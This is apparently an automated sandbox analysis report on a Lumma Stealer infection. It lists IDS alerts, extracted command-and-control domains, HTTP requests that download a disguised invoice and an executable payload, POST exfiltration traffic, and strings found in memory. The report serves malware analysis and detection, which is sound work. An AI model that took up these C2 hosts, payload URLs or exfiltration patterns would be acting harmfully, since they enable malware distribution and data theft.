  AB15g1--
HTTPS traffic detected (TLS 1.2, server -> client):
  62.182.21.105:443 -> 192.168.2.5:49704
  62.182.21.105:443 -> 192.168.2.5:49708
  104.21.16.1:443 -> 192.168.2.5:49803
  104.21.16.1:443 -> 192.168.2.5:49815
  104.21.16.1:443 -> 192.168.2.5:49821
  104.21.16.1:443 -> 192.168.2.5:49832
  104.21.16.1:443 -> 192.168.2.5:49838
  104.21.16.1:443 -> 192.168.2.5:49849
  104.21.16.1:443 -> 192.168.2.5:49855
  104.21.16.1:443 -> 192.168.2.5:49871
                      Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.2666686122.000001C393781000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666568838.000001C3977BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665256230.000001C397868000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666496000.000001C397800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdbGCTL source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdb source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: c:\Qt\WebUI2\Release\WebUI.pdb source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B906000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr
                      Source: Binary string: wntdll.pdb source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: explorer.pdb source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exe; Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe; Code function: 15_2_0040301A GetFileAttributesW, SetLastError, FindFirstFileW, FindClose, CompareFileTime
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe; Code function: 15_2_00402B79 FindFirstFileW, SetFileAttributesW, lstrcmpW, lstrcmpW, SetFileAttributesW, DeleteFileW, FindNextFileW, FindClose, SetFileAttributesW, RemoveDirectoryW, ??3@YAXPAX@Z, ??3@YAXPAX@Z

                      Networking

Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49803 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058308 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (securesways .click) : 192.168.2.5:55295 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49815 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49832 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49838 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49855 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49849 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49821 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49871 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49803 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49803 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49849 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49815 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49815 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49871 -> 104.21.16.1:443
Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 104.21.16.1 443
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: securesways.click
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: global traffic | HTTP traffic detected: GET /new/files/Documents/KlarnaInvoice42611.pdf HTTP/1.1Host: dimitricostruzioni.chConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dimitri/TCUINOVJ.exe HTTP/1.1Host: dimitricostruzioni.ch
Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: SUB6GB SUB6GB
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49803 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49815 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49832 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49838 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49855 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49849 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49821 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49871 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 62.182.21.105:443
Source: global traffic | HTTP traffic detected: GET /documentcomplie HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dimitricostruzioni.chConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WJQPB7ANUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12770Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TIKP9HLMGXUPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15036Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9SYU6HZEH96User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7UT9CMYTEQ8VRR08WFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LNMEBUH85CDZUNVO0JVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 403646Host: securesways.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: securesways.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /documentcomplie HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dimitricostruzioni.chConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /new/files/Documents/KlarnaInvoice42611.pdf HTTP/1.1Host: dimitricostruzioni.chConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dimitri/TCUINOVJ.exe HTTP/1.1Host: dimitricostruzioni.ch
Source: global traffic | DNS traffic detected: DNS query: dimitricostruzioni.ch
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: securesways.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: securesways.click
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr | String found in binary or memory: http://bugreports.qt-project.org/
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr | String found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c0rl.m%L
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 00000015.00000003.2840015148.0000000003107000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 00000006.00000002.3283350977.0000020861A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicer
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://dimitricostruzioni.ch
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://epscd.catcert.net/crl/ec-acc.crl0.
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://epscd2.catcert.net/crl/ec-acc.crl0
Source: qmgr.db.6.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.catcert.cat0
Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
